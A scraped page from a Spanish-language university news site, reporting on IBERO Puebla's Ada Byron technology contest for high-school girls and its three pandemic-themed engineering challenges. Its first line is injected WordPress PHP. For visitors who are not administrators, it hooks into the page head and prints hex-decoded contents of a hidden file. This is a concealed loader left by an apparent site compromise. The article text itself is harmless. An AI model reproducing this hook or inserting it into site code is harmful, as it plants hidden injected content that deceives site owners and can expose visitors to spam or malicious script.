if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } IBERO Puebla impulsa a futuras ingenieras con Concurso de Vanguardia Tecnológica – La Opinión Universitaria La Opinión Universitaria
Menu

IBERO Puebla impulsa a futuras ingenieras con Concurso de Vanguardia Tecnológica

 

Mónica Alexa Cuautle Martínez, estudiante de bachillerato, escribió “quiero estudiar Ingeniería en Biotecnología” en Instagram para conocer opciones de universidades. Así fue como dio con la convocatoria del Concurso Vanguardia Tecnológica Ada Byron, organizado por la IBERO Puebla.

Siempre tuvo interés en conocer cómo se explican las cosas. Su curiosidad la ha conducido a buscar crear algo que pueda ayudar a las personas, esto a partir de la materialización de los conocimientos que adquiere día con día. “Todos mis trabajos académicos son exploratorios. No he tomado cursos, pero voy haciendo las cosas yo sola y viendo cómo puedo mejorar”, explica.

Al igual que ella, varias jóvenes se han visto atraídas por la ciencia y la tecnología desde temprana edad. Por todos los documentales que vio cuando era niña, Isabella Luna Landa quería ser astronauta; poco después, desarrolló su amor por la biología. Por su parte, Brenda Sofía Pastrana Monzón heredó de sus padres, ambos ingenieros, el interés por la robótica.

Luego de la alianza entre la Universidad de Deusto y la IBERO Puebla para celebrar el Capítulo México del Premio Ada Byron en 2019, se plantearon otras estrategias para reforzar la esencia del galardón: visibilizar el papel de las mujeres en la ciencia y la tecnología. Una de ellas fue la creación del Concurso Vanguardia Tecnológica Ada Byron, una apuesta por impulsar el aprendizaje en estas áreas de las jóvenes de preparatoria.

Al igual que el año pasado, la convocatoria de 2020 sesgó los perfiles ingenieriles de la IBERO Puebla en tres retos enmarcados en la coyuntura mundial:

Reto 1: Ingeniería humanitaria: producción en tiempos de coronavirus, donde las participantes debían diseñar una propuesta de bajo costo para la distribución de bienes necesarios durante la pandemia.

Reto 2: Tecnología e ingeniería aplicada vs COVID-19, cuyo principio consistía en la elaboración de un prototipo de respirador.

Reto 3: Laboratorio de química y biotecnología: aprendiendo desde la nueva normalidad, el cual implicó el desarrollo de una práctica de laboratorio, desde casa, para demostrar algún principio de química o biotecnología.

Las participantes recibieron capacitaciones y talleres virtuales para el uso de programas, elaboración de prototipos y estructuración de investigaciones. Allí, las chicas presentaron sus propuestas ante un comité especializado y recibieron retroalimentación. Posteriormente, realizaron una nueva exposición con los productos finales. La premiación se celebró a distancia el 21 de noviembre.

 

 

Tweets recientes